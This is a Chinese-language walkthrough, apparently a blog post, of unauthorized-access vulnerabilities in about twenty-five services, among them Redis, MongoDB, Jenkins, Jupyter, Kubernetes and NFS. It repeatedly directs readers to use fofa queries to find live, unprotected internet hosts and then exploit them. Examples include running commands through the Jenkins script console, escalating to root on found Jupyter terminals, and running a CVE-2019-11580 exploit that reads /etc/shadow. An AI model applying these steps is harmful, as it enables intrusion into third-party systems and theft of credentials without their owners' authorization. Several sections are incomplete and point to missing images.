未授权访问可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷,导致其他用户可以直接访问,从而引发重要权限可被操作、数据库、网站目录等敏感信息泄露。日录遍历目前主要存在未授权访问漏洞的有:NFS 服务,Samba服务,LDAP,Rsync,FTPGitLab,Jenkins,MongoDB, Redis, ZooKeeper, ElasticSearch, Memcache,CouchDB,Docker,Solr,Hadoop,Dubbo 等...
一:Redis未授权访问漏洞
1.在fofa上搜索 port="6379"找到一个具有未授权访问漏洞的网页(6379为默认的redis端口号)
2.在kali里安装redis 命令为:apt install redis
3.安装成功后输入redis-cli -h ip地址 -p 6379,进入后输入info显示成功
二:MongoDB未授权访问漏洞
1.因为mongoDB的默认端口为27017,我们直接在fofa上搜索 port="27017"(搜索端口号为27017的网站)
2.打开navicat进行连接连接名任意,主机填写找到的网址,点击测试连接,提示连接成功证明存在漏洞
三:Memcached未授权访问漏洞
Windows 下安装 Memcached | 菜鸟教程 (runoob.com)
1.解压好在此目录打开命令行
2.在命令行输入memcached.exe -d install、memcached.exe -d start
3.打开kali输入telnet 存在漏洞的ip 11211进行telnet侦测
4.输入stats,查看memcache服务状态
5.使用Nmap程序的脚本进行漏洞扫描,nmap -p 11211 --script memcached-info ip地址
四:Zookeeper未授权访问漏洞
1.使用fofa搜索端口号为2181的网站
这个环境搭建失败
五:Jenkins未授权访问漏洞
1.在fofa中搜索 port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"
2.在打开的页面地址栏后加/manage/script/index.php进入
3.在其中输入println "'whoami".execute().text找到他的用户名
六:Jupyter NoteBook未授权访问漏洞
1.在fofa中搜索"Jupyter Notebook" && port="8888" && "terminals"
2.找到一个不需要密码的网站证明存在未授权访问漏洞,并且会直接跳到web管理界面
3.点击new-->termial新建一个终端
4.输入whomi、ls以及sudo su 进入root证明存在漏洞
七:Elasticsearch未授权访问漏洞
在fofa中使用图片中的语法进行搜索
然后对搜索到的地址进行访问且是不需要用户登录证明存在未授权漏洞
打开后可以查看一些节点信息
八:Kibana未授权访问漏洞
使用以下语句在fofa中进行搜索
然后查找地址不需要登陆的界面证明存在未授权漏洞
九:Docker Remote APl未授权访问漏洞
十:Kubernetes Api Server未授权访问漏洞
在fofa中使用以下语句进行搜索
在打开的网页中直接访问 8080 端口会返回可用的 API列表
十一:Hadoop未授权访问漏洞
在fofa中使用以下语句搜索
不需要账户登陆的页面进入证明存在未授权漏洞
十二:ActiveMQ未授权访问漏洞
在fofa中使用以下语句搜索环境
然后使用默认admin用户登录可进入证明存在未授权漏洞
十三:RabbitMQ未授权访问漏洞
使用以下语句搜索端口
然后使用游客用户登录账号密码guest
登陆进入证明存在未授权漏洞
十四:Springboot Actuator未授权访问漏洞
使用以下语句搜索网站
看到存在4xx或5xx的报错后可以确定web应用使用了springboot框架
然后拼接路径查看泄露数据/trace /env
十五:FTP未授权访问漏洞(匿名登陆)
十六:JBoss未授权访问漏洞
使用以下语句在fofa中进行搜索
找到一个welcome页面
拼接路径使用jmx-console
能进入就证明存在未授权漏洞
十七:Ldap未授权访问漏洞
首先下载ldapadmin工具
然后在fofa中输入以下语句搜索
打开工具在start处新建connections
在搜索结果中找到可以测试成功的地址
连接成功后进入文件内容证明存在未授权漏洞
十八:Rsync未授权访问漏洞
使用fofa搜索以下的语句
找到可以打开下级目录的地址
然后再查看其中的文件夹我们可以看到需要密码
十九:VNC未授权访问漏洞
使用fofa搜索以下语句
使用vnc链接验证我们可以看到有的地址需要密码,大家有能力的可以找几个不需要密码的
二十:Dubbo未授权访问漏洞
输入图片中在fofa中搜索
找到地址后使用kali输入telnet连接成功
二十一:NSF共享目录未授权访问
在fafo中搜索语句
然后我们需要在kali中安装nfs apt install nfs-common
使用搜索到的IP地址可以看到共享目录
挂载相应目录到本地
二十二:Druid未授权访问漏洞
在fofa中搜索以下语句
进入站点后可以查看各种内部信息的证明存在未授权漏洞
也可以使用这些后缀进行拼接 /system/druid/websession.html
/webpage/system/druid/websession.html
二十三:Altassian Crowd未授权访问漏洞
漏洞利用脚本github地址:https://github.com/jas502n/CVE-2019-11580
1.git clone https://github.com/jas502n/CVE-2019-11580
2.cd CVE-2019-11580/
3.python CVE-2019-11580.py http://192.168.18.138:8095
http://192.168.18.138:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow
二十四:RTSP未授权访问漏洞
在fofa中搜索 (port="554") && (is_honeypot=false && is_fraud=false) && protocol="rtsp"
下载vlc 点击媒体-->打开网络串流
将找到的网址填入后点击播放
二十五:couchDB未授权访问漏洞
使用fofa搜索以下语句
使用kali执行未授权漏洞测试语句 curl